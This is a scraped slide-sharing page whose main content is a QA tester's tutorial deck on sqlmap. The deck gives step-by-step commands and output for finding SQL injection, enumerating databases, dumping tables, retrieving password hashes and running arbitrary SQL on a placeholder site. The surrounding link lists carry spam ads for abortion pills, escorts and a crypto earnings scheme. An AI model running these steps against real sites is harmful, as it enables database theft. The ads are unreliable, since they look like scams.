Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...SelfMade bd
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfayushiqss
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfonteinmasabamasaba
 
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456KiaraTiradoMicha
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Nitya salvi
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...Shane Coughlan
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfVishalKumarJha10
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech studentsHimanshiGarg82
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrandmasabamasaba
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrainmasabamasaba
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxalwaysnagaraju26
 

Dernier (20)

Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide Deck
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
 

SQLMAP Tool Usage - A Heads Up

  • 1. SQLMAP SQL INJECTION AUTOMATION TESTING TOOL Pinaki mohapatra QA @Mindfire Solutions
  • 2. Roadmap  SQL Injection  SQLMAP  Installation Procedure  Case study (A Partical demonstration using some predefined command that supports SQLMAP tool)
  • 3. SQL INJECTION  SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).  A attacker or malicious user could provide unexpected inputs to the application that are then used to frame and execute SQL statements on the database.
  • 4. Cause The following things might result from SQL injection:  The user could log in to the application as another user, even as an administrator.  The user could view private information belonging to other users e.g. details of other users’ profiles, their transaction details etc.  The user could change application configuration information and the data of the other users.  The user could modify the structure of the database; even delete tables in the application database.  The user could take control of the database server and execute commands on it at will.
  • 5. SQLMAP Sqlmap is an open source command-line automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can then choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS user session and other DB related information like databases, tables, columns, user credentails, there privileges or in simply we can say it expose the entire data that are present in DBMS.
  • 6. SQLMAP Installation Procedure  Pre-requisites to run sqlmap; Python 2.7.x and 3.3.x (Recommended by users) http://www.python.org/download/  Download SQLMAP; http://sourceforge.net/projects/sqlmapwin/? source=navbar  Reference; https://github.com/sqlmapproject/sqlmap/wiki/Usag e
  • 7. SQLMAP: Finding !! Syntax Format: sqlmap.py -u “<Target url>” (e.g http://www.test.com/index.php/id=5 ) or sqlmap.py -u “http://www.test.com/index.php/id=5” --dbs Default behavior;  Test all GET and/or POST Parameters, for all sqlmap options or commands for all databases.  Yes it may take a long time for executing commands.
  • 8. SQLMAP: Finding !! Vebosity : Option: -v: This option can be used to set the verbosity level of output messages. There exist seven levels of verbosity. The default level is 1 in which information, warning, error, critical messages and Python tracebacks (if any occur) are displayed. 0: Show only Python tracebacks, error and critical messages. 1: Show also information and warning messages. 2: Show also debug messages. 3: Show also payloads injected. 4: Show also HTTP requests. 5: Show also HTTP responses' headers. 6: Show also HTTP responses' page content.
  • 9. SQLMAP: Enumeration (I)  Objective Get/Retrieve data from DBMS tables  What can you get : --current-db : Extact current application DB in use --current-user : Expose current DBMS user in use --users : Expose or list out all the users from DB --passwords : Lists all DBMS users, password hashes (sqlmap will automatically try to crack the hashes with a dictionary attack)
  • 10. SQLMAP: Enumeration (I)  What can you get : --privileges : List user privileges --dbs : Lists all the databases --tables -D <Database name> : List all the table from a specific database --columns -T<Table name>-D<Database name> : List all the columns from a specific table under a database --dump (-D,-T,-C can be used to select what data to dump): Dump data from database/table/column.
  • 12. STEP 1 Syntax: sqlmap.py -u "<Target URL>" Objective: This is a simple command which checks the input parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different kinds of sql injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system os, database name and version. Example: sqlmap.py -u "http://www.test.com/index.php?id=10" Result: C:UserspinakimDesktopsqlmapsqlmap>sqlmap.py -u"http://www.test.com/web/prod_detail.php?ID=216" sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:23:29 [11:23:29] [INFO] using 'C:UserspinakimDesktopsqlmapsqlmapoutputwww.test.comsession' as session file [11:23:29] [INFO] resuming match ratio '0.9' from session file
  • 13. [11:23:29] [INFO] resuming injection parameter 'ID' from session file [11:23:29] [INFO] resuming injection type 'numeric' from session file [11:23:29] [INFO] resuming 0 number of parenthesis from session file [11:23:29] [INFO] resuming back-end DBMS 'mysql 5' from session file [11:23:29] [INFO] resuming back-end DBMS operating system 'None' from session fi le [11:23:29] [INFO] resuming back-end DBMS operating system 'None' from session fi le [11:23:29] [INFO] testing connection to the target url [11:23:32] [INFO] testing for parenthesis on injectable parameter [11:23:32] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5 [*] shutting down at: 11:23:32
  • 14. STEP 2 Syntax: sqlmap.py -u "<Target URL>" --dbs Objective: It list down the databases if the target URL is vulnerable to sql injection. Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --dbs Result: [11:32:17] [INFO] fetching database names [11:32:17] [INFO] fetching number of databases [11:32:17] [INFO] read from file 'C:UserspinakimDesktopsqlmapsqlmapoutput www.test.comsession': 2 [11:32:17] [INFO] read from file 'C:UserspinakimDesktopsqlmapsqlmapoutput www.test.comsession': information_schema [11:32:17] [INFO] read from file 'C:UserspinakimDesktopsqlmapsqlmapoutput www.test.comsession': testingpa available databases [2]: [*] information_schema [*] testingpa
  • 15. STEP 3 Syntax: sqlmap.py -u "<Target URL>" --tables -D <Database name> Objective: It find the list of tables that exist for the specified Database. Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --tables -D TestDB Result: web application technology: Apache, PHP 5.4.4 back-end DBMS: MySQL >= 5.0.0 [10:34:37] [INFO] fetching tables for database 'testingpa' [10:34:37] [INFO] fetching number of tables for database 'testingpa' [10:34:37] [INFO] retrieved: 36 [10:34:59] [INFO] retrieved: reg_cat [10:37:33] [INFO] retrieved: reg_section
  • 16. [10:44:46] [INFO] retrieved: admin_right [10:47:35] [INFO] retrieved: admin_user [10:50:20] [INFO] retrieved: new_cat [10:53:03] [INFO] retrieved: new_image [10:56:20] [INFO] retrieved: new_section [11:00:11] [INFO] retrieved: ave_config [11:02:50] [INFO] retrieved: ave_sections [11:06:06] [INFO] retrieved: download_new_cat [11:09:17] [INFO] retrieved: audio_cat [11:11:37] [INFO] retrieved: audio_image [11:14:22] [INFO] retrieved: audio_section . . [12:33:11] [INFO] retrieved: vendor_section Database: testingqa [36 tables]
  • 17. +-----------------------+ | reg_cat | | reg_section | | admin_group | | admin_right | | admin_user | | new_cat | | new_image | | new_section | | ave_config | | ave_sections | | download_new_cat | | audio_cat | | audio_image | | audio_section | | video_audio_cat | | video_audio_section | | linking_config | | linking_section | | test_cat |
  • 18. | test_image | | test_section | | test_reg | | test_videos | | miscellanesous_test | | miscellanesous_image | | miscellanesous_section | | newsfuse_config | | newsfuse_section | | newsfuse_section | | promo_reg_cat | | promo_image | | promo_section | | promo_test | | promo_videos | | test_reg_section | | vendor_section | +-----------------------+ [12:36:46] [INFO] Fetched data logged to text files under 'C:UserspinakimDesk topsqlmapsqlmapoutputwww.test.com' [*] shutting down at: 12:36:46
  • 19. STEP 4 Syntax: sqlmap.py -u "<Target URL>" --columns -D <Database name> -T <Table name> Objective: It find the list of columns that exist for the specified tables under the Database. Example: sqlmap.py -u "http://www.test.com/index.php?id=10" –columns -D TestDB -T Users Result: web application technology: Apache, PHP 5.4.4 back-end DBMS: MySQL 5 [10:46:43] [INFO] fetching columns for table 'req_section' on database 'testingpa' [10:46:43] [INFO] fetching number of columns for table 'reg_section' on datab ase 'testingpa' [10:46:43] [INFO] retrieved: 5 [10:46:56] [INFO] retrieved: reg_id [10:49:13] [INFO] retrieved: int(11)
  • 20. [10:50:52] [INFO] retrieved: reg_url [10:53:06] [INFO] retrieved: varchar(255) [10:55:53] [INFO] retrieved: reg_redirect [10:59:07] [INFO] retrieved: varchar(255) [11:01:42] [INFO] retrieved: reg_active [11:04:30] [INFO] retrieved: int(11) [11:06:03] [INFO] retrieved: reg_cat_id [11:07:27] [INFO] retrieved: int(11) Database: testingpa Table: reg_section [5 columns]
  • 21. +-----------------+------------------+ | Column | Type | +-----------------+------------------+ | reg_active | int(11) | | reg_id | int(11) | | reg_redirect| varchar(255) | | reg_url | varchar(255) | | reg_cat_id | int(11) | +-----------------+------------------+ [11:09:08] [INFO] Fetched data logged to text files under 'C:UserspinakimDesk topsqlmapsqlmapoutputwww.test.com' [*] shutting down at: 11:09:08
  • 22. STEP 5 Syntax: sqlmap.py -u "<Target URL>" --dump -D <Database Name> -T <Table Name> Objective: Now lets comes to the most interesting part, of extracting the data from the table. The below command will retrieve or simply dump the data of the particular table. Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --dump -D TestDB -T users Result: [13:15:46] [INFO] fetching entries for table 'ave_config' on database 'testingpa' [13:15:46] [INFO] fetching number of entries for table 'ave_config' on database 'testingpa' [13:15:46] [INFO] retrieved: 1 [13:15:59] [INFO] retrieved: 1 [13:16:34] [INFO] retrieved: [13:16:49] [INFO] retrieved: info@test.com
  • 23. [13:22:18] [INFO] retrieved: mike@test.com [13:27:47] [INFO] retrieved: Testing property [13:32:49] [INFO] retrieved: CMS Database: testingpa Table: ave_config [1 entry] +-----------+---------------+------------------------+-------------------------+-----------------------+-------------+ |config_id |site_email_cc|site_email_from |site_email_to |site_owner |site_title | +-----------+---------------+------------------------+-------------------------+-----------------------+-------------+ | 1 | NULL |info@test.com |mike@test.com |Testing property | CMS | +-----------+---------------+------------------------+-------------------------+-----------------------+-------------+ [13:33:51] [INFO] Table 'testingpa.ave_config' dumped to CSV file 'C:Userspi nakimDesktopsqlmapsqlmapoutputwww.test.comdumptestingpaave_co nfig.csv' [13:33:51] [INFO] Fetched data logged to text files under 'C:UserspinakimDesk topsqlmapsqlmapoutputwww.test.com' [*] shutting down at: 13:33:51
  • 24. Other Related Command 1. To find out more information about the remote system database use the option "-b". It will try to find the exact banner of the database server. Example: sqlmap.py -u "http://www.test.com/index.php?id=10" -b Result: [11:44:40] [INFO] fetching banner [11:44:40] [INFO] the back-end DBMS operating system is None banner: '5.1.67-0+test1' [11:44:40] [INFO] Fetched data logged to text files under 'C:UserspinakimDesk topsqlmapsqlmapoutputwww.test.com' 2. The next command will fetch the list of users and passwords. Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --users --passwords --privileges Result:
  • 25. [11:53:23] [INFO] fetching database users [11:53:23] [INFO] fetching number of database users [11:53:23] [INFO] read from file 'C:UserspinakimDesktopsqlmapsqlmapoutput www.test.comsession': 1 [11:53:23] [INFO] read from file 'C:UserspinakimDesktopsqlmapsqlmapoutput www.test.comsession': 'testingpa'@'%' database management system users [1]: [*] 'testingpa'@'%' [11:53:23] [INFO] fetching database users password hashes [11:53:23] [INFO] fetching number of password hashes for user 'testingpa' [11:53:23] [INFO] read from file 'C:UserspinakimDesktopsqlmapsqlmapoutput www.test.comsession': [11:53:23] [INFO] read from file 'C:UserspinakimDesktopsqlmapsqlmapoutput www.test.comsession': [11:53:23] [INFO] retrieved: [11:53:27] [WARNING] unable to retrieve the number of password hashes for user ' testingpa' [11:53:27] [ERROR] unable to retrieve the password hashes for the database users
  • 26. Other Related Command 3. For getting the current user & current database information Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --current-user --is-dba --current-db --thread=10 Result: [11:57:30] [INFO] fetching current user [11:57:30] [INFO] retrieving the length of query output [11:57:30] [INFO] retrieved: 10 [11:59:52] [INFO] retrieved: testingpa@% current user: 'testingpa@%' [11:59:52] [INFO] fetching current database [11:59:52] [INFO] retrieving the length of query output [11:59:52] [INFO] retrieved: 8 [12:00:58] [INFO] retrieved: testingpa current database: 'testingpa' [12:00:58] [INFO] testing if current user is DBA [12:00:58] [INFO] retrieving the length of query output
  • 27. Other Related Command [12:00:58] [INFO] retrieved: [12:01:06] [INFO] retrieved: current user is DBA: 'False' [12:01:08] [INFO] Fetched data logged to text files under 'C:UserspinakimDesk topsqlmapsqlmapoutputwww.test.com' 4. Run some arbitrary sql command Example: sqlmap.py -u "http://www.test.com/index.php?id=10" -–sql- query="SELECT * FROM <table name>"